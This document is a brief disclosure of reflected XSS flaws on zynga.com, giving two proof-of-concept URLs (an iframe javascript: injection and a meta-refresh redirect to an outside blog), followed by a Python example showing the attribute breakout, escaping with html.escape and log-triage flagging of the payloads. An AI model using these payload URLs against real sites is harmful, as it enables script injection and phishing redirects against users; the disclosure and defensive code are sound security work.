Zynga.COM Multiple XSS vulnerability

Vendor: www.zynga.com
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: www.epsilonlambda.co.cc

------------------------------------------------------------------------------------------------------------------------------------------------------------

* Multiple XSS vulnerability

Cross-site scripting vulnerability in Zynga. Allows iframe injection and URL redirection.

1. Demo iframe injection:
http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Ciframe%20src=%22javascript:alert%28%273psil0nlAmBdA%27%29;%22%3E%3C/iframe%3E

2. Demo URL redirection:
http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Cmeta%20HTTP-EQUIV=%22REFRESH%22%20content=%220;%20url=http://www.epsilonlambda.wordpress.com%22%3E

------------------------------------------------------------------------------------------------------------------------------------------------------------

Thanks to side-effects and greets to r007ki7 and my love taashu.
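Both demo URLs start the `c` parameter with `%22%3E` (`">`), which is the classic way to close a double-quoted HTML attribute and the tag around it, so everything after it is parsed as new markup. The example below is added here and is not part of the advisory or of Zynga's code: it assumes the page reflects `c` inside a double-quoted attribute (inferred from the payload shape), uses a constructed stand-in template, and contrasts the verbatim echo with attribute-context escaping via `html.escape(..., quote=True)`. It also includes a small request-log triage helper that flags the two URLs from the advisory, and a benign control that it does not flag. Function names and the benign URL are constructed for illustration.

```python
"""
Reflected XSS in an attribute context: vulnerable echo vs. escaped output,
plus a log-triage check. Added example, not code from the advisory or vendor.

Assumption: the vulnerable page echoes the `c` query parameter inside a
double-quoted HTML attribute (inferred from payloads beginning with `">`).
"""
import html
from urllib.parse import urlparse, unquote

# Constructed stand-in for the server-side page; `{c}` is where the
# reflected parameter lands (inside a double-quoted attribute).
TEMPLATE = '<input type="hidden" name="c" value="{c}">'

# The two proof-of-concept URLs published in the advisory above.
DEMO_URLS = [
    "http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Ciframe%20src="
    "%22javascript:alert%28%273psil0nlAmBdA%27%29;%22%3E%3C/iframe%3E",
    "http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Cmeta%20HTTP-EQUIV="
    "%22REFRESH%22%20content=%220;%20url=http://www.epsilonlambda.wordpress.com%22%3E",
]
# Constructed benign request for comparison (not from the advisory).
BENIGN_URL = "http://cn.zynga.com/index.php?t=list&r=us&c=farmville"


def reflected_param(url: str, name: str = "c") -> str:
    """Return the percent-decoded value of the query parameter the page reflects.

    Parsed by hand rather than with parse_qs: the payloads contain literal ';'
    characters, which older parse_qs versions treat as a pair separator.
    """
    for pair in urlparse(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def render_vulnerable(c: str) -> str:
    """Echo the parameter verbatim. A value starting with `">` terminates the
    attribute and the <input> tag, and the rest is parsed as new elements."""
    return TEMPLATE.format(c=c)


def render_hardened(c: str) -> str:
    """Escape for an attribute context: `"` -> &quot;, `<` -> &lt;, `>` -> &gt;.
    The value can no longer close the attribute or open a tag."""
    return TEMPLATE.format(c=html.escape(c, quote=True))


def breaks_out_of_attribute(rendered: str) -> bool:
    """Defender's check on the rendered page: the template contains exactly one
    tag, so any additional '<' means the reflected value introduced markup."""
    return rendered.count("<") > TEMPLATE.count("<")


def flag_suspicious(urls):
    """Request-log triage: flag URLs whose decoded `c` value contains characters
    that can change HTML structure inside a quoted attribute."""
    return [u for u in urls if any(ch in reflected_param(u) for ch in '<>"\'')]


if __name__ == "__main__":
    for url in DEMO_URLS:
        value = reflected_param(url)
        print("payload      :", value)
        print("vulnerable   :", render_vulnerable(value),
              "-> breaks out:", breaks_out_of_attribute(render_vulnerable(value)))
        print("hardened     :", render_hardened(value),
              "-> breaks out:", breaks_out_of_attribute(render_hardened(value)))
        print()
    print("flagged requests:", flag_suspicious(DEMO_URLS + [BENIGN_URL]))
```

The `breaks_out_of_attribute` check is deliberately tied to the constructed template (one tag), which is what makes it a reliable oracle here; in a real deployment the equivalent control is output encoding chosen for the exact context the value lands in (attribute, text node, URL, script), not a filter on the input.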